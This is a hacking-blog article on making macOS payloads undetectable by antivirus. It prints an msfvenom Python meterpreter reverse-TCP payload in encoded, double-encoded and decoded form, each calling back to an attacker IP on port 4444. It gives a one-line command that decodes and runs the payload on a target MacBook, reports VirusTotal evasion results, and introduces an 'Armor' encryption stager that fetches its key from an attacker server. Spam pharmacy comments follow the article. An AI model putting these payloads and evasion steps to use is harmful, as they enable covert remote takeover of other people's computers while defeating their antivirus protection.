Hack Like ProHackingMaster HackPremium

How to Create an Undetectable Payload – Hack macOS Like Pro

25
Encrypting payloads and encoding stagers are more effective against macOS than one might think. Plus, it’s very easy to evade VirusTotal and macOS antivirus software using a few simple tricks.The goal of this project was to locate a known and easily detectable macOS payload, then find a method that allowed that very same payload to execute on the target MacBook. This would reliably confirm if any discovered evasion method was effective at executing known payloads. In addition to testing malicious files against VirusTotal, they were tested in macOS Mojave (v10.14) against popular antivirus software such as AvastAVGBitDefenderSophos, and ClamXAV.Readers shouldn’t confuse this subject matter with bypassing GateKeeper or System Integrity Protections (SIP). Executing an unsigned application and evading virus scanners are two different topics. The focus of this article will be on evading the detection of antivirus software and VirusTotal. As we’ll see below, in most cases, simply encoding a payload is enough to get around antivirus detection.[irp posts=”1593″ name=”What is the concept behind SQL injection? How does SQL injection work?”]

Base64 Encoding Basics

Encoding, as an antivirus evasion technique, is (generally) a very terrible idea as it’s easily decoded and identified. However, encoding Python and Bash scripts is common practice in projects like Empire and msfvenom. (if You are Not Familiar With MSF and empire then go back and just google it) It allows coders to execute complex scripts without worrying about escaping special characters which might cause a payload to break or fail.

Let’s talk about base64 encoding for a minute and consider the below strings.

echo 'one' | base64
b25lCg==

echo 'one two' | base64
b25lIHR3bwo=

echo 'one two three' | base64
b25lIHR3byB0aHJlZQo=

echo 'one two three four' | base64
b25lIHR3byB0aHJlZSBmb3VyCg==

echo 'one two three four five' | base64
b25lIHR3byB0aHJlZSBmb3VyIGZpdmUK

All of the strings can be easily decoded (-d in Kali, -D in macOS) using the below command.

base64 -d <<< 'b25lIHR3byB0aHJlZSBmb3VyIGZpdmUK'

Notice the end of the strings change subtly, while the beginning always appears the same. The same is true for most msfvenom payloads. If only the IP address and port number are changed, the beginning of the produced base64 encoded payloads will always be the same for every hacker and pentester using msfvenom. Below is an example created by msfvenom using the IP address “10.42.0.1.”

aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=

The below msfvenom output uses the same payload but with a different IP address of “192.168.0.2.”

aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMC4yJyw0NDQ0KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==
No matter what IP and port are used, the first 142 characters are always identical when using this msfvenom payload. If not decoded and analyzed for nefarious code, it would at least seem reasonable for antivirus software to detect common base64 strings — but they don’t.

Single Base64 Encoded Payloads

Believe it or not, finding a malicious file that VirusTotal and antivirus could detect was a challenge.  Executing the below command produced the following output.

msfvenom -p python/meterpreter/reverse_tcp LHOST=10.42.0.1 LPORT=4444

[-] No platform was selected, choosing Msf::Module::Platform::Python from the payload
[-] No arch selected, selecting arch: python from the payload
Payload size: 446 bytes
import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=')))

This is a base64 encoded Python one-liner designed to interact with Metasploit. Saving the one-liner to a file called “thisfileisevil.py” and uploading it to VirusTotal resulted in a 4/58 detection rate.

This detection rate is surprisingly low. Decoding the embedded base64 string clearly reveals the Python script is designed to connect to a remote server (10.42.0.1) on port 4444.

base64 -d <<< 'aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo='

import socket,struct,time
for x in range(10):
	try:
		s=socket.socket(2,socket.SOCK_STREAM)
		s.connect(('10.42.0.1',4444))
		break
	except:
		time.sleep(5)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
	d+=s.recv(l-len(d))
exec(d,{'s':s})

Saving the above decoded Python code to a file called “thisfileisevil_without_encoding.py” and uploading it to VirusTotal resulted in the following 1/56 detection rates.

Double Base64 Encoded Payloads

If a common encoded payload is capable of evading most antivirus software, double-encoding it should be an effective technique too, right? Well, not quite. Encoding the encoded msfvenom output and uploading it to VirusTotal resulted in the following 1/54 detection.

Again, 1/54 detection by Microsoft, which doesn’t help any macOS using antivirus software. This was accomplished by first encoding the msfvenom output — the very same msfvenom payload that was previously detected.

cat thisfileisevil.py | base64

aW1wb3J0IGJhc2U2NCxzeXM7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHsyOnN0ciwzOmxhbWJkYSBi
OmJ5dGVzKGIsJ1VURi04Jyl9W3N5cy52ZXJzaW9uX2luZm9bMF1dKCdhVzF3YjNKMElITnZZMnRs
ZEN4emRISjFZM1FzZEdsdFpRcG1iM0lnZUNCcGJpQnlZVzVuWlNneE1DazZDZ2wwY25rNkNna0pj
ejF6YjJOclpYUXVjMjlqYTJWMEtESXNjMjlqYTJWMExsTlBRMHRmVTFSU1JVRk5LUW9KQ1hNdVky
OXVibVZqZENnb0p6RXdMalF5TGpBdU1TY3NORFEwTkNrcENna0pZbkpsWVdzS0NXVjRZMlZ3ZERv
S0NRbDBhVzFsTG5Oc1pXVndLRFVwQ213OWMzUnlkV04wTG5WdWNHRmpheWduUGtrbkxITXVjbVZq
ZGlnMEtTbGJNRjBLWkQxekxuSmxZM1lvYkNrS2QyaHBiR1VnYkdWdUtHUXBQR3c2Q2dsa0t6MXpM
bkpsWTNZb2JDMXNaVzRvWkNrcENtVjRaV01vWkN4N0ozTW5Pbk45S1FvPScpKSkK

It can be executed in the target MacBook with the following command.

python -c "$(printf '%s' 'ENCODED-PAYLOAD-HERE' | base64 -D)"

Here, printf and base64 are using the MacBook to decode (-D) the string and immediately executing the command (-c) with Python — which is again decoding the inner payload and creating a reverse TCP connection.

To my surprise, both VirusTotal and popular antivirus software is evaded this way. Not one tested antivirus software was able to detect a double-encoded payload in the form of a text file or an AppleScript.

Encrypted Payloads

So far, we’ve learned encoding and double-encoding payloads will evade the detection of most antivirus software (although, using raw code is better). Still, encoding scripts and payloads encourages a cat and mouse game between hackers and antivirus developers. It’s only a matter of time before someone at AVG or Avast discovers this Null Byte article and antivirus scanners start recursively decoding base64 strings and looking for common encoded signatures.

This got me thinking about a more reliable method for defeating macOS antivirus; a solution that’s a bit more difficult to detect and prevent. Encrypting the payload, in addition to encoding it, will provide a better solution to evade antivirus scanners.

Why Is Encrypting Better Than Encoding?

The primary downside to encoding is antivirus software’s ability to continuously decode base64 strings and easily discover the embedded payload. No matter how many times an attacker encodes their payload, it can be reverse engineered. By encrypting the payload, antivirus software will ultimately find a string of unreadable data. The encrypted payload can’t be scanned by AV software or read by humans — not without knowing the decryption key.

Which brings me to Armor, a simple shell script I created to illustrate how encrypting macOS payloads can be automated and executed.

How the ‘Armor’ Script Works

Armor will encrypt the contents of any file it’s given. The file can contain a one-liner, a complex Python script with hundreds of lines of code, or a post-exploitation script written in any programming language supported by macOS. The file contents are encrypted with a one-time key. The key is then temporarily hosted on the attacker’s server and downloaded by the target MacBook to decrypt the payload.

Below is an example of Armor being used with a simple Netcat payload.

There are a few things happening in this GIF. I’ll explain each step in order.A Netcat listener is started on port 4444. The “payload.txt” file is read and shown to contain a simple Bash one-liner that, when executed, will create a TCP connection between the target MacBook at the attacker’s Netcat listener. Armor is used to encrypt the bash one-liner. Ncat is used to host the decryption key on the attacker’s server. When the stager is executed in the target MacBook (not shown in the GIF), the bash one-liner is decrypted and executed without writing any data to the hard drive. Ncat immediately terminates the listener after the key has been used. When the Netcat connection is established, the attacker has remote access to the target MacBook.For a technical explanation of what the script is doing and how it executes commands without writing data to the target’s hard drive, head over to my GitHub page to view the comments. Readers interested in giving Armor a quick test run can follow along using the below steps.

Step 1Install Armor

Armor can be found on my GitHub page and cloned using the below command.

git clone https://github.com/tokyoneon/Armor

Cloning into 'Armor'...
remote: Enumerating objects: 7, done.
remote: Counting objects: 100% (7/7), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 7 (delta 0), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (7/7), done.

Change (cd) into the newly create Armor/ directory.

cd Armor/

Then, give the armor.sh script permissions to execute.

Lovepreet Singh
CEO & FOUNDER OF" FIVE RIVERS INCORPORATION - LEADING SOFTWARE & CYBER SECURITY DEVELOPMENT COMPANY" || CERTIFIED ETHICAL HACKER || FUTURE TRILLIONAIRE || FUTURISTIC || "DULL SCHOOL STUDENT" || (Follow this link to message me on WhatsApp: https://wa.me/13018426470)

How do hackers successfully brute-force WPS enabled WiFi when the password of WiFi is too strong?

Previous article

What Is SSL? How Do SSL Certificates Work?

Next article

You may also like

25 Comments

  1. Clomid Sans Ordonnance Pas Cher When Does Amoxil Suspension Go Bad Who Makes Amoxicillin [url=http://drugslr.com]cheapest cialis 20mg[/url] Priligy 30 O 60

  2. An impressive share! I’ve just forwarded this onto a colleague who had been doing
    a little homework on this. And he actually ordered me dinner because I
    discovered it for him… lol. So allow me to reword this….
    Thank YOU for the meal!! But yeah, thanks for spending some time to discuss this topic here on your website.

  3. What’s up i am kavin, its my first time to commenting anywhere, when i
    read this piece of writing i thought i could also make comment due to this good article.

  4. Levitra 10 Avant Buy Miodar Where Can I Buy Elocon [url=http://ciali10mg.com]online pharmacy[/url] Quick Online Orlistat Buy Metoprolol Without Scrop Cialis Precio Oficial

  5. I love it when people come together and share ideas. Great site, stick with
    it!

  6. My partner and I stumbled over here by a different page and thought I might check things out.
    I like what I see so now i am following you. Look forward to exploring your web
    page for a second time.

  7. Calvizie Propecia Finasteride How To Buy Tamoxifen Buy Ucerax [url=http://yafoc.com]alternativa a propecia[/url] Propecia Covered By Insurance Prostate Enlargement buy accutane online reviews

  8. I don’t even know how I finished up here, but I assumed this submit was great.

    I don’t know who you’re but definitely you are going to a well-known blogger if you aren’t already.
    Cheers!

  9. Hi there, I discovered your web site via Google while looking for a related subject,
    your web site came up, it looks great. I have bookmarked
    it in my google bookmarks.
    Hello there, just was alert to your weblog thru Google, and found that it’s truly informative.

    I’m gonna watch out for brussels. I will be grateful if
    you happen to proceed this in future. A lot of other people
    will probably be benefited from your writing. Cheers!

  10. It’s a shame you don’t have a donate button! I’d most certainly donate to this
    outstanding blog! I suppose for now i’ll settle for book-marking and adding your RSS feed
    to my Google account. I look forward to fresh updates
    and will share this blog with my Facebook group. Chat
    soon!

  11. I’m not sure where you are getting your info,
    but good topic. I needs to spend some time learning much more or understanding more.
    Thanks for great information I was looking for this info for my mission.

  12. Hi, I do think this is an excellent website. I stumbledupon it 😉 I am going to revisit
    yet again since I bookmarked it. Money and freedom
    is the greatest way to change, may you be rich and continue to help other
    people.

  13. … [Trackback]

    […] Read More to that Topic: techandsecurity.net/undetectable-payload.html […]

  14. … [Trackback]

    […] Read More on on that Topic: techandsecurity.net/undetectable-payload.html […]

  15. Heya i am for the first time here. I came across this board and I find It
    truly useful & it helped me out a lot. I hope to give something back and aid others like you helped me.

  16. It’s awesome to visit this website and reading the
    views of all mates concerning this post, while I am also keen of getting familiarity.

  17. Hi, i read your blog from time to time and i own a similar one and i was
    just wondering if you get a lot of spam remarks? If so how do you reduce
    it, any plugin or anything you can advise?
    I get so much lately it’s driving me crazy so any assistance is very much appreciated.

  18. Please let me know if you’re looking for a article writer for your weblog.

    You have some really great posts and I feel I would be a good asset.
    If you ever want to take some of the load off, I’d absolutely love
    to write some articles for your blog in exchange for
    a link back to mine. Please send me an email if interested.
    Kudos!

  19. I am really enjoying the theme/design of your web site.

    Do you ever run into any browser compatibility issues? A small number of
    my blog readers have complained about my website not working correctly in Explorer but looks great
    in Chrome. Do you have any advice to help fix
    this problem?

  20. My spouse and I stumbled over here by a different web
    address and thought I might check things out. I like what I see so now i’m
    following you. Look forward to looking at your web page for a second time.

  21. Link exchange is nothing else except it is just placing the
    other person’s webpage link on your page
    at suitable place and other person will also do similar in favor of you.

  22. Greetings! I’ve been following your web site for some time now and finally got the courage to go ahead and give you
    a shout out from Porter Texas! Just wanted to tell you keep up the great job!

  23. I truly love your blog.. Great colors & theme. Did you make this web site
    yourself? Please reply back as I’m trying to create my very
    own site and want to know where you got this from or just what the theme is named.
    Thanks!

  24. Excellent site you’ve got here.. It’s hard to find excellent writing like yours nowadays.
    I seriously appreciate individuals like you!
    Take care!!

  25. Hi! Do you use Twitter? I’d like to follow you if that would be okay.
    I’m undoubtedly enjoying your blog and look forward to new posts.

Leave a reply

Your email address will not be published. Required fields are marked *